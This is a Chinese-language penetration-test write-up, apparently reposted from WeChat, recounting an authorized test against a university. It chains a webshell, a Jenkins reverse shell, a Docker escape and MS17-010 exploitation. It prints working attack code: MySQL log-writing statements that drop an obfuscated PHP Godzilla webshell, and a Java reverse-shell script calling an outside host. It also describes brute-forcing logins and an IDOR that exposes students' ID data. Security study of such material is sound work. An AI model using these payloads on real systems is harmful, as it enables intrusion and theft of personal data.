记一次授权渗透测试

admin
admin
admin
141928
文章
117
评论
2024年11月9日21:31:27评论16 views字数 2199阅读7分19秒阅读模式

 

TDOA

1.拿到目标站点,是一个高校,Googlehacking找到一些学号以及教务系统。
记一次授权渗透测试

记一次授权渗透测试

2.随便点击一个链接,来到登录界面。

记一次授权渗透测试

3.URL中有OAServices,这难道是个OA系统,于是fofa一手。

记一次授权渗透测试

记一次授权渗透测试

4.TD,嗯...梭哈是一种智慧,跑出管理员cookie。
记一次授权渗透测试

5. 2016版的,历史漏洞挺多,找到数据库管理功能尝试通过写日志shell。

记一次授权渗透测试

6.桌面随便新建个.sql文件进行上传,然后burp抓包开搞,先开启日志,set、select什么的都有过滤,但是能大小写绕过。

记一次授权渗透测试

7. 设置日志路径。
记一次授权渗透测试

8.ok,写shell,嗯...又有过滤,过滤了<?php和一些函数,能怎么办,绕呗,<?php这里php是可以去掉的,然后函数就用注释符来干扰。
记一次授权渗透测试

9.写入成功,记得把日志停了。
记一次授权渗透测试

Set global general_log=on;#开启记录日志

SET global general_log_file='D:/MYOA/webroot/xxx.php';#指定日志文件路径

SELECT '<? file_put_contents/**/(/**/$_SERVER/**/[/**/"DOCUMENT_ROOT"/**/]/**/./**/"//update.php"/**/,/**/base64_decode/**/(/**/"Base64编码后的哥斯拉马"/**/)/**/)/**/;/**/?><? /**/unlink/**/(/**/__FILE__/**/)/**/;/**/?>';#有过滤,使用/**/注释符进行绕过

Set global general_log=off;#关闭日志记录

10.访问一下xxx.php,然后会将哥斯拉马写入到当前目录的update.php中,哥斯拉上线。

记一次授权渗透测试

11.system权限,非常棒。

记一次授权渗透测试

12.tasklist /SVC查杀软,有MSE,嗯...人太菜了,不会写免杀,只能站在巨人的肩上。

记一次授权渗透测试

13.直接dddd。

记一次授权渗透测试

14.用哥斯拉上传执行,然后cs成功上线。
记一次授权渗透测试

15.TDOA的话,数据库配置文件是在D:/MYOA/webroot/inc/oa_config,打开查看。
记一次授权渗透测试

16.找到一些姓名 等信息,厚码。

记一次授权渗透测试

未授权

1. 用之前收集到的学号尝试登录教务系统,抓包测试后发现验证码可复用,直接开爆,登录之后发现有个在校证明。
记一次授权渗透测试

2.嗯哼,姓名、学院、sfz这些都有。
记一次授权渗透测试

3.还有个二维码 扫下看看,哟,这xh字段不就是学号吗,还是明文。
记一次授权渗透测试

4.将刚才登录的账号注销掉。
记一次授权渗透测试

5.访问链接,修改学号,成功返回其他人信息。
记一次授权渗透测试

MS17-010

1.搭建好隧道后,fscan开扫,发现一堆17010,msf直接开打。
记一次授权渗透测试记一次授权渗透测试

记一次授权渗透测试

2.扫描到的跟着往下打,梭哈的快乐。

记一次授权渗透测试

Vmware Vcenter Unauthorized(CVE-2021-21972)

扫到一个CVE

[+] https://x.x.x.x/ware-vcenter-unauthorized-rce-cve-2021-21972

直接用exp:https://github.com/NS-Sp4ce/CVE-2021-21972

等待写入后 冰蝎连接

记一次授权渗透测试

是真的菜,提权没成功。

Jenkins Unauthorized Rce

1.有个Jenkins
记一次授权渗透测试

2.在系统管理->脚本命令行,可以命令执行。
记一次授权渗透测试

3.直接反弹shell。
记一次授权渗透测试

String host="x.x.x.x";
int port=1333;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

4.监听上线。

记一次授权渗透测试

Docker Api Unauthorized Rce

1.还有一堆的Docker Api Unauthorized,直接开搞。

记一次授权渗透测试

2. docker拉取一个镜像。
记一次授权渗透测试

3.使用拉取的镜像启动一个新的容器,以sh或者/bin/bash作为shell启动,并且将该宿主机的根目录挂在到容器的/mnt目录下。

记一次授权渗透测试

4.进入/mnt目录下即可逃逸到宿主机
记一次授权渗透测试

5.写任务计划反弹shell
记一次授权渗透测试

6.监听,等一分钟左右,上线。

记一次授权渗透测试

总结

还有一堆ssh、mysql等弱口令以及Memcached unauthorized、Mongodb unauthorized这些,就不写了,整理整理交报告了。

 

原文始发于微信公众号(moonsec):【渗透实战】记一次授权渗透测试

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月9日21:31:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次授权渗透测试http://cn-sec.com/archives/1786987.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息